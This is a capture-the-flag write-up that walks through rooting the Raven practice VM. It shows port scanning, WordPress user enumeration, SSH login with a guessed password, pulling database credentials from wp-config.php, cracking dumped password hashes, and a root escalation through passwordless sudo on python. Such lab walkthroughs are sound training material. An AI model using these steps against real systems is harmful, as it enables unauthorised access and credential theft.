Reven Security

Desciption:

Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking.

As the description tells about the machine , a boot2root machine made for a beginner or an intermediate. Here I started with the normal and as usual method that is IP scan :

┌──(root💀N4TR0)-[~]
└─# netdiscover -i vboxnet0
Currently scanning: 172.16.17.0/16 | Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
192.168.56.1 08:00:27:7e:28:b0 1 42 PCS Systemtechnik GmbH
192.168.56.4 08:00:27:e6:5b:b8 1 60 PCS Systemtechnik GmbH

After getting the IP I just started with the NMAP scan which gives us the detailed information about the services running with the respective port numbers.

┌──(root💀N4TR0)-[~]
└─# nmap -v -p- -v -A 192.168.56.4
Nmap scan report for 192.168.56.4
Host is up, received arp-response (0.00052s latency).
Scanned at 2020–12–22 00:01:07 IST for 13s
Not shown: 65531 closed ports
Reason: 65531 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKh+Rdkjjy5opFFtXyNt53JA6r4vcBU/5phBALFa3s/Tp1nk905px99+yBZcDIsWCJRcpZLSjrB6HLSP32+zhb9pnVWpTS8Jj7Sxrz1UKww4jiqLTRWM498YHjUrTKPkKb9hC4+xhZjVme8BA7JP65hGMJFHWbmWbDIeQ014EVAJAAAAFQDco2jBlKC2i5fJa3EJU8Cjb7la1wAAAIBZgJ8eIMdjFiKHPVKBClyJeUKdlSh0zsLVz4qNOsd9Q1Tn0qUsHRFHzZ4TKxitg6ICqq3COGIf09sevQHZR2tvDm5mV/mx9rBDK88h31ZyiuGr6aEoo+xPZR4TY++mFNY+deB3N7qtGpUH0ACMgrzfFjtIoaxub9y8IzlTTeB+uQAAAIB9h0DDtN8hOxAkGnFKV3hsq4VivzclLtuUD8vFk6Br51X1S2TdrWCsjqJC+RqW3Q6Z/QNJo3CqlflRbT92HMDenF1h04ET7tv9Rzplj89rFI0NEJ1MUgWkIsf4O4kyM2I6c27Law+tsa1htco6mTuoc8jLOhlhccbsYSgUnhfcNg==
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV+10/5GT/t8oHYE/2droICkXQmZ+vUokINs67o65J9JuOTwxfYpcDKG7Ir5SCVyht+9yblaT4CDKpEkTP7i3yZH1kATaNThwwwDrbYJj2Trn0lCNRMzL8UwYIYBQLVGSBPr40i+rp0aimY6NCohYE7yPZfGQCMgUabN70ZOPX5av/11pe4aaiB1VkdQI6KGOIxX9BzXZ+xx18aGY2L4gEHsSFKHsCHMDcf0LRwCL57JU7slPLH52dgsQc+XxLwjRPOdi3ndVrXnwGkEMBdw0eM7Ta0UyJnsMoynCkaJFG7FaNe/hdkI68g4o8nugBk4RiKOlDBxAIHYT+YUQmrJaF
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFWnVibAcyZ6gXZIUhw1P2L5l+9u9WKbtJn4rAZ0+MDtzwKhN/d6sqH3FUnTcswHaT8pKcJvGKSGZae1oqxb3oQ=
| 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAesXwn7VLv7XmXLfdeAjITtlzFHXlFpvHQt4gnQ3xSI
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind syn-ack ttl 64 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36288/tcp status
| 100024 1 41657/tcp6 status
| 100024 1 46574/udp6 status
|_ 100024 1 55855/udp status
36288/tcp open status syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:E6:5B:B8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/22%OT=22%CT=1%CU=41060%PV=Y%DS=1%DC=D%G=Y%M=080027%
OS:TM=5FE0E9F8%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=I%II=
OS:I%TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%
OS:O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W
OS:6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=40%CD=S)
Uptime guess: 198.841 days (since Sat Jun 6 03:50:12 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here I got 4 ports open that are 22, 80, 111, and the last one is 36288.

The port 36288 that is a tcp open port but when I called it on web nothing came up instead of a error page. So, steping ahead with port no. 80.

http://192.168.56.4/

Stepping toward examine each and every webpage available on the host with the source code I got the first Flag of the machine:

view-source:http://192.168.56.4/service.html
FLAG 1

Playing with the directories of the server found that wordpress is running on host machine.

Without wasting my time I scanned for the login page and the users available to log in

http://192.168.56.4l/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.56.4%2Fwordpress%2Fwp-admin%2F&reauth=1
┌──(root💀N4TR0)-[~]
└─# wpscan --url http://192.168.56.4/wordpress -e -U /usr/share/wordlists/rockyou.txt


[i] User(s) Identified:

[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] michael
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Here I tried to log in to the server with both the usernames and also used them as password but can’t login so tried them on SSH service with the same for login and got success with the user “michael”.

"michael:michael"

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# ssh michael@192.168.56.4
michael@192.168.56.4's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Tue Dec 22 09:03:34 2020 from 192.168.56.1
michael@Raven:~$

Here after checking directories that the normal user can access for some time I didn’t get anything but when I went in the “/var/www/” directory I found the next flag of the machine :

michael@Raven:/var/www$ cat flag2.txt 
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

Getting second flag I stepped towards the hole to get in as root but trying many ways to do so but failed after-all I stepped ahead towards the configuration files that I can access with the user “Michael” and finally I got the access to the “MySQL” service using the credentials that I got in the wp-config.php file.

root : R@v3nSecurity

michael@Raven:/var/www/html/wordpress$ mysql -u root -p

After having access to the MySQL Database I got the password of another user that is “ Steven”:

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

Using John hash cracker to crack the hash I got the password for the user Steven that is:

Steven : pink84

michael@Raven:/var/www/html/wordpress$ su steven
Password:

Searching for the permissions if any the user can get access in as a root user and I got it in a single try:

$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python

So the hole I got to get access to as root user is “sudo” without any password on the python service. So without wasting much time I just get into it to call the bash shell using sudo python cmd.:

$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
root@Raven:/var/www/html/wordpress#
root@Raven:/var/www/html/wordpress# id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www/html/wordpress# whoami
root

And finally I got the final password of the machine :

Final Flag

But in between this all I didn’t got the third flag of the machine so I again tried to get it and finally I got the flag in the blog section table that is “wp_posts” named table.

$  select * from wp_posts;
Third Flag

Enjoyed a lot while rooting the machine. Thanks @William McCann for the machine.

Hope you read and like it.

🤣🤣🤣🤣🤣🤣🤣